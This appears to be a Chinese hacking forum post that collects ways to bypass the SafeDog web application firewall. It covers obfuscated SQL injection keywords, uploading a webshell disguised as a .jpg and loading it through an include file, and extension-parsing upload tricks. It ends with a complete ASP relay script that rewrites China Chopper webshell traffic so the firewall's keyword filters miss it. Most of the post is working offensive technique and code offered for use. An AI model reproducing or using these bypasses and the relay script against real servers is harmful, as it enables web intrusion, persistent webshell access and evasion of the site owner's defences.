过安全狗技术汇总:

previous page next page

1.过注入

方法一:  a.asp?aaa=%00&id=sql语句

方法二:  a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin

方法三:/**/替换空格

方法四:/*!关键词*/ 包围关键字

 

2.过大马被阻拦访问

方法一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。

解决方法:先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!#include file=dama.jpg >  这样再访问da.asp  就不会被拦截了。

 

3.过菜刀连接一句话被拦截

方法一:不用菜刀连接一句话,用别的一句话连接端。

方法二:中转下连接菜刀,把过滤掉的词替换掉。

 

4.1.asp;.jpg这样的文件拦截

方法一:;1.asp;.jpg

方法二:保密

具体就为大家总结这么多了,安全狗 反正基本可以无视了!!

大家还有什么要补充的可以发在下面!

 

下面这个脚本是过安全狗连接菜刀用的

用法: 先把这个脚本放到个可执行.asp的目录

然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址

然后把地址输入进菜刀,密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型

例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码

这样输入就菜刀

这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

  1. <% 
  3.     '饶过的原理,抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!  
  5.     JmStr=Replace(Request.Form,"$_POST","$_REQUEST") 
  7.     JmStr=Replace(JmStr,"->|","-->|") 
  9.     JmStr=Replace(JmStr,"@eval(","@eval   (") 
  11.     JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String") 
  13.     JMUrl=request("dz") 
  15.     response.write  request("dz") 
  17.     JmRef=JMUrl 
  19.     JmCok=""
  21.     response.write  PostData(JMUrl,JmStr,JmCok,JmRef) 
  23.     Function PostData(PostUrl,PostStr,PostCok,PostRef) 
  25.     Dim Http 
  27.     Set Http = Server.CreateObject("msxml2.serverXMLHTTP") 
  29.     With Http 
  31.     .Open "POST",PostUrl,False 
  33.     .SetRequestHeader "Content-Length",Len(PostStr) 
  35.     .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
  37.     .SetRequestHeader "Referer",PostRef 
  39.     '.SetRequestHeader "Cookie",PostCok 
  41.     .Send PostStr 
  43.     PostData = .ResponseBody 
  45.     End With 
  47.     Set Http = Nothing 
  49.     PostData =bytes2BSTR(PostData) 
  51.     End Function 
  53.      
  55.     Function bytes2BSTR(vIn) 
  57.     Dim strReturn 
  59.     Dim I, ThisCharCode, NextCharCode 
  61.     strReturn = ""
  63.     For I = 1 To LenB(vIn) 
  65.     ThisCharCode = AscB(MidB(vIn, I, 1)) 
  67.     If ThisCharCode < &H80 Then 
  69.     strReturn = strReturn & Chr(ThisCharCode) 
  71.     Else 
  73.     NextCharCode = AscB(MidB(vIn, I + 1, 1)) 
  75.     strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
  77.     I = I + 1
  79.     End If 
  81.     Next 
  83.     bytes2BSTR = strReturn 
  85.     End Function 
  87.      
  89.     Function URLEncoding(vstrin) 
  91.     strReturn=""
  93.     Dim
  95.     For i=1 To Len(vstrin) 
  97.     ThisChr=Mid(vstrin,i,1) 
  99.     if Abs(Asc(ThisChr))< &HFF Then 
  101.     strReturn=strReturn & ThisChr 
  103.     Else 
  105.     InnerCode=Asc(ThisChr) 
  107.     If InnerCode<0 Then 
  109.     InnerCode=InnerCode + &H10000 
  111.     End If 
  113.     Hight1=(InnerCode And &HFF00) \&HFF 
  115.     Low1=InnerCode And &HFF 
  117.     strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) 
  119.     End if
  121.     Next 
  123.     strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
  125.     strReturn=Replace(strReturn,chr(43),"%2B")  'J6156增加转换+字符 
  127.     'strReturn=Replace(strReturn,过滤字符,"转换为字符")  '在此增加要过滤的代码 
  129.     URLEncoding=strReturn 
  131.     End Function 
  133.      
  135.     %>
previous page start next page